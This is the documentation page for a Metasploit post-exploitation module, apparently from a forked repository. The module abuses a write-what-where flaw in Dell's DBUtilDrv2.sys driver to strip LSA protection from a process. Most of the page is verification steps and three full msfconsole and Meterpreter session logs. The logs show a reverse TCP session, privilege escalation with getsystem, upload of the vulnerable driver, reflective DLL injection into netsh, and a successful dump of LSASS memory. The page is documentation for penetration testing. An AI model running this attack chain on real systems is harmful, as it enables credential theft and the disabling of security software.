metasploit-gs/documentation/modules/post/windows/manage/dell_memory_protect.md at 3da170a43c7f288fe9bc88fe325da488733acac3

adam/metasploit-gs

Fork 0

Files

T

h00die 557a15a115 spelling fixes on docs

2023-10-10 14:46:18 -04:00

16 KiB

Raw Blame History

Vulnerable Application

The Dell driver dbutil_2_3.sys was affected by a local privilege escalation issue due to a write-what-where condition exposed by a few of the driver's IOCTLs. This was assigned CVE-2021-21551. Dell "fixed" this issue by deprecating dbutil_2_3.sys and switching to DBUtilDrv2.sys. The new driver prevent low privileged users from interacting with the driver but did not fix the write-what-where condition.

This module leverages the write-what-where condition in DBUtilDrv2.sys version 2.5 or 2.7 to disable or enable LSA protect on a given PID (assuming the system is configured for LSA Protection). This would allow, for example, dumping LSASS memory even when Secure Boot and RunAsPPL are enabled. Or, as another example, allow an attacker to prevent antivirus from accessing the memory of a chosen process.

The Dell drivers are not distributed with Metasploit. The user must truly BYOVD and upload the driver and installation files to the target system themselves. The module will install, exploit, and remove the driver. Both installing the driver and dumping memory require high privileged accounts. The following is the required files per version and their hashes:

dbutildrv2.sys version 2.5

DBUtilDrv2.cat - 23bbc48543a46676c5cb5e33a202d261a33704fe
dbutildrv2.inf - c40ebb395cb79c3cf7ca00f59f4dc17930435fc5
DBUtilDrv2.sys - 90a76945fd2fa45fab2b7bcfdaf6563595f94891

dbutildrv2.sys version 2.7

DBUtilDrv2.cat - 06f2b629e7303ac1254b52ec0560c34d72b46155
dbutildrv2.inf - 19f8da3fe9ddbc067e3715d15aed7a6530732ab5
DBUtilDrv2.sys - b03b1996a40bfea72e4584b82f6b845c503a9748
WdfCoInstaller01009.dll - c1e821b156dbc3feb8a2db4fdb9cf1f5a8d1be6b

See scenarios below for an example.

Supported Targets

Windows 10 x64 v1507 - v19044 (21H2)
Windows 11 x64 21H2
Windows Server 2016 x64 v1607 - v1709
Windows Server 2019 x64 v1909 - v2009 (20H2)

The targets must have UEFI or Secure Boot enabled and the RunAsPPL registry key should be configured.

Options

DRIVER_PATH

The path on the RHOST containing the driver inf, cat, and sys (and coinstaller depending on the version). For example, in the scenarios below, the driver files are uploaded to C:\Windows\Temp, so this should be set DRIVER_PATH C:\\Windows\\Temp.

ENABLE_MEM_PROTECT

Enable or disable memory protection on the targeted process. false will remove memory protection and true will enable it.

PID

The ID of the targeted process. If set to 0 (the default value), the module will automatically find lsass.exe.

Verification Steps

Start msfconsole
Get a system Meterpreter session on a host using UEFI or Secure Boot and configured with RunAsPPL.
Obtain the pid of lsass.exe: ps | grep lsass
Background the session
Do: post/windows/gather/memory_dump
Set the SESSION, PID, and DUMP_PATH options.
Do: run
Observe a permission denied error.
Return to the previous session: sessions -i 1
Upload the required driver files: upload /home/albinolobster/drivers/2_7/ C:\\Windows\\Temp\\
Background the session
Do: use post/windows/manage/dell_memory_protect
Set the SESSION, PID, and DRIVER_PATH (e.g. C:\\Windows\\Temp) options.
Do: run
Observe the module exits successfully.
Do: post/windows/gather/memory_dump
Do: run
Observe the successful memory dump of lsass

Scenarios

Windows 11 Build 22000.348 x64 using DBUtilDrv2 version 2.7

[*] Started reverse TCP handler on 10.0.0.9:1270 
[*] Meterpreter session 1 opened (10.0.0.9:1270 -> 10.0.0.8:47730 ) at 2021-12-07 12:48:57 -0800

meterpreter > sysinfo
Computer        : BADBLOOD
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: badblood\albinolobster
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > ps | grep lsass
Filtering on 'lsass'

Process List
============

 PID  PPID  Name       Arch  Session  User  Path
 ---  ----  ----       ----  -------  ----  ----
 740  572   lsass.exe  x64   0

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/windows/gather/memory_dump
msf6 post(windows/gather/memory_dump) > options

Module options (post/windows/gather/memory_dump):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DUMP_PATH                   yes       File to write memory dump to
   DUMP_TYPE  standard         yes       Minidump size (Accepted: standard, full)
   PID                         yes       ID of the process to dump memory from
   SESSION                     yes       The session to run this module on

msf6 post(windows/gather/memory_dump) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/memory_dump) > set PID 740
PID => 740
msf6 post(windows/gather/memory_dump) > set DUMP_PATH C:\\Windows\\Temp\\lsass_dump
DUMP_PATH => C:\Windows\Temp\lsass_dump
msf6 post(windows/gather/memory_dump) > run

[*] Running module against BADBLOOD
[*] Dumping memory for lsass.exe
[-] Post aborted due to failure: payload-failed: Unable to open process: Access is denied.
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > upload /home/albinolobster/drivers/2_7/ C:\\Windows\\Temp
[*] uploading  : /home/albinolobster/drivers/2_7/WdfCoInstaller01009.dll -> C:\Windows\Temp\WdfCoInstaller01009.dll
[*] uploaded   : /home/albinolobster/drivers/2_7/WdfCoInstaller01009.dll -> C:\Windows\Temp\WdfCoInstaller01009.dll
[*] uploading  : /home/albinolobster/drivers/2_7/DBUtilDrv2.cat -> C:\Windows\Temp\DBUtilDrv2.cat
[*] uploaded   : /home/albinolobster/drivers/2_7/DBUtilDrv2.cat -> C:\Windows\Temp\DBUtilDrv2.cat
[*] uploading  : /home/albinolobster/drivers/2_7/dbutildrv2.inf -> C:\Windows\Temp\dbutildrv2.inf
[*] uploaded   : /home/albinolobster/drivers/2_7/dbutildrv2.inf -> C:\Windows\Temp\dbutildrv2.inf
[*] uploading  : /home/albinolobster/drivers/2_7/DBUtilDrv2.sys -> C:\Windows\Temp\DBUtilDrv2.sys
[*] uploaded   : /home/albinolobster/drivers/2_7/DBUtilDrv2.sys -> C:\Windows\Temp\DBUtilDrv2.sys
meterpreter > background
[*] Backgrounding session 1...
msf6 post(windows/gather/memory_dump) > use post/windows/manage/dell_memory_protect 
msf6 post(windows/manage/dell_memory_protect) > options

Module options (post/windows/manage/dell_memory_protect):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   DRIVER_PATH                          yes       The path containing the driver inf, cat, and sys (and coinstaller)
   ENABLE_MEM_PROTECT  false            yes       Enable or disable memory protection
   PID                                  yes       The targeted process
   SESSION                              yes       The session to run this module on

msf6 post(windows/manage/dell_memory_protect) > set SESSION 1
SESSION => 1
msf6 post(windows/manage/dell_memory_protect) > set DRIVER_PATH C:\\Windows\\Temp
DRIVER_PATH => C:\Windows\Temp
msf6 post(windows/manage/dell_memory_protect) > set PID 740
PID => 740
msf6 post(windows/manage/dell_memory_protect) > run

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Launching netsh to host the DLL...
[+] Process 692 launched.
[*] Reflectively injecting the DLL into 692...
[+] Exploit finished
[*] Post module execution completed
msf6 post(windows/manage/dell_memory_protect) > use post/windows/gather/memory_dump 
msf6 post(windows/gather/memory_dump) > options

Module options (post/windows/gather/memory_dump):

   Name       Current Setting             Required  Description
   ----       ---------------             --------  -----------
   DUMP_PATH  C:\Windows\Temp\lsass_dump  yes       File to write memory dump to
   DUMP_TYPE  standard                    yes       Minidump size (Accepted: standard, full)
   PID        740                         yes       ID of the process to dump memory from
   SESSION    1                           yes       The session to run this module on

msf6 post(windows/gather/memory_dump) > run

[*] Running module against BADBLOOD
[*] Dumping memory for lsass.exe
[*] Downloading minidump (4.11 MiB)
[+] Memory dump stored at /home/albinolobster/.msf4/loot/20211207125102_default_172.16.144.11_windows.process._368616.bin
[*] Deleting minidump from disk
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) >

Windows 10 Build 19044.1348 x64 using DBUtilDrv2 version 2.5

[*] Started reverse TCP handler on 10.0.0.9:1270 
[*] Meterpreter session 1 opened (10.0.0.9:1270 -> 10.0.0.8:39523 ) at 2021-12-08 07:18:27 -0800

meterpreter > sysinfo
Computer        : DESKTOP-JCD6JN8
OS              : Windows 10 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-JCD6JN8\albinolobster
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > ps | grep lsass
Filtering on 'lsass'

Process List
============

 PID  PPID  Name       Arch  Session  User  Path
 ---  ----  ----       ----  -------  ----  ----
 732  568   lsass.exe  x64   0

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/windows/gather/memory_dump
msf6 post(windows/gather/memory_dump) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/memory_dump) > set PID 732
PID => 732
msf6 post(windows/gather/memory_dump) > set DUMP_PATH C:\\Windows\\Temp\\lsass_dump
DUMP_PATH => C:\Windows\Temp\lsass_dump
msf6 post(windows/gather/memory_dump) > run

[*] Running module against DESKTOP-JCD6JN8
[*] Dumping memory for lsass.exe
[-] Post aborted due to failure: payload-failed: Unable to open process: Access is denied.
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > upload /home/albinolobster/drivers/2_5/ C:\\Windows\\Temp\\
[*] uploading  : /home/albinolobster/drivers/2_5/DBUtilDrv2.cat -> C:\Windows\Temp\\DBUtilDrv2.cat
[*] uploaded   : /home/albinolobster/drivers/2_5/DBUtilDrv2.cat -> C:\Windows\Temp\\DBUtilDrv2.cat
[*] uploading  : /home/albinolobster/drivers/2_5/dbutildrv2.inf -> C:\Windows\Temp\\dbutildrv2.inf
[*] uploaded   : /home/albinolobster/drivers/2_5/dbutildrv2.inf -> C:\Windows\Temp\\dbutildrv2.inf
[*] uploading  : /home/albinolobster/drivers/2_5/DBUtilDrv2.sys -> C:\Windows\Temp\\DBUtilDrv2.sys
[*] uploaded   : /home/albinolobster/drivers/2_5/DBUtilDrv2.sys -> C:\Windows\Temp\\DBUtilDrv2.sys
meterpreter > background
[*] Backgrounding session 1...
msf6 post(windows/gather/memory_dump) > use post/windows/manage/dell_memory_protect 
msf6 post(windows/manage/dell_memory_protect) > set SESSION 1
SESSION => 1
msf6 post(windows/manage/dell_memory_protect) > set DRIVER_PATH C:\\Windows\\Temp\\
DRIVER_PATH => C:\Windows\Temp\
msf6 post(windows/manage/dell_memory_protect) > set PID 732
PID => 732
msf6 post(windows/manage/dell_memory_protect) > run

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Launching netsh to host the DLL...
[+] Process 3508 launched.
[*] Reflectively injecting the DLL into 3508...
[+] Exploit finished
[*] Post module execution completed
msf6 post(windows/manage/dell_memory_protect) > use post/windows/gather/memory_dump 
msf6 post(windows/gather/memory_dump) > run

[*] Running module against DESKTOP-JCD6JN8
[*] Dumping memory for lsass.exe
[*] Downloading minidump (5.93 MiB)
[+] Memory dump stored at /home/albinolobster/.msf4/loot/20211208072121_default_172.16.144.6_windows.process._495675.bin
[*] Deleting minidump from disk
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) >

Windows Server 2016 (10.0.14393) x64 using DBUtilDrv2 version 2.5 and PID option set to 0

[*] Started reverse TCP handler on 10.0.0.3:4444 
[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.8:45172 ) at 2021-12-18 04:12:03 -0800

meterpreter > sysinfo
Computer        : WIN-7ESIGFVFQEG
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN-7ESIGFVFQEG\albinolobster
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > ps | grep lsass
Filtering on 'lsass'

Process List
============

 PID  PPID  Name       Arch  Session  User  Path
 ---  ----  ----       ----  -------  ----  ----
 664  504   lsass.exe  x64   0

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/windows/gather/memory_dump
msf6 post(windows/gather/memory_dump) > set SESSIOn 1
SESSIOn => 1
msf6 post(windows/gather/memory_dump) > set PID 664
PID => 664
msf6 post(windows/gather/memory_dump) > set DUMP_PATH C:\\Windows\\Temp\\lsass_dump
DUMP_PATH => C:\Windows\Temp\lsass_dump
msf6 post(windows/gather/memory_dump) > run

[*] Running module against WIN-7ESIGFVFQEG
[*] Dumping memory for lsass.exe
[-] Post aborted due to failure: payload-failed: Unable to open process: Access is denied.
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > upload /home/albinolobster/drivers/2_5/ C:\\Windows\\Temp\\
[*] uploading  : /home/albinolobster/drivers/2_5/DBUtilDrv2.cat -> C:\Windows\Temp\\DBUtilDrv2.cat
[*] uploaded   : /home/albinolobster/drivers/2_5/DBUtilDrv2.cat -> C:\Windows\Temp\\DBUtilDrv2.cat
[*] uploading  : /home/albinolobster/drivers/2_5/dbutildrv2.inf -> C:\Windows\Temp\\dbutildrv2.inf
[*] uploaded   : /home/albinolobster/drivers/2_5/dbutildrv2.inf -> C:\Windows\Temp\\dbutildrv2.inf
[*] uploading  : /home/albinolobster/drivers/2_5/DBUtilDrv2.sys -> C:\Windows\Temp\\DBUtilDrv2.sys
[*] uploaded   : /home/albinolobster/drivers/2_5/DBUtilDrv2.sys -> C:\Windows\Temp\\DBUtilDrv2.sys
meterpreter > background
[*] Backgrounding session 1...
msf6 post(windows/gather/memory_dump) > use post/windows/manage/dell_memory_protect
msf6 post(windows/manage/dell_memory_protect) > set DRIVER_PATH C:\\Windows\\Temp\\
DRIVER_PATH => C:\Windows\Temp\
msf6 post(windows/manage/dell_memory_protect) > set SESSION 1
SESSION => 1
msf6 post(windows/manage/dell_memory_protect) > run

[*] Set PID option 664 for lsass.exe
[*] Launching netsh to host the DLL...
[+] Process 3008 launched.
[*] Reflectively injecting the DLL into 3008...
[+] Exploit finished
[*] Post module execution completed
msf6 post(windows/manage/dell_memory_protect) > use post/windows/gather/memory_dump
msf6 post(windows/gather/memory_dump) > run

[*] Running module against WIN-7ESIGFVFQEG
[*] Dumping memory for lsass.exe
[*] Downloading minidump (4.70 MiB)
[+] Memory dump stored at /home/albinolobster/.msf4/loot/20211218041511_default_172.16.144.14_windows.process._536152.bin
[*] Deleting minidump from disk
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) >

16 KiB Raw Blame History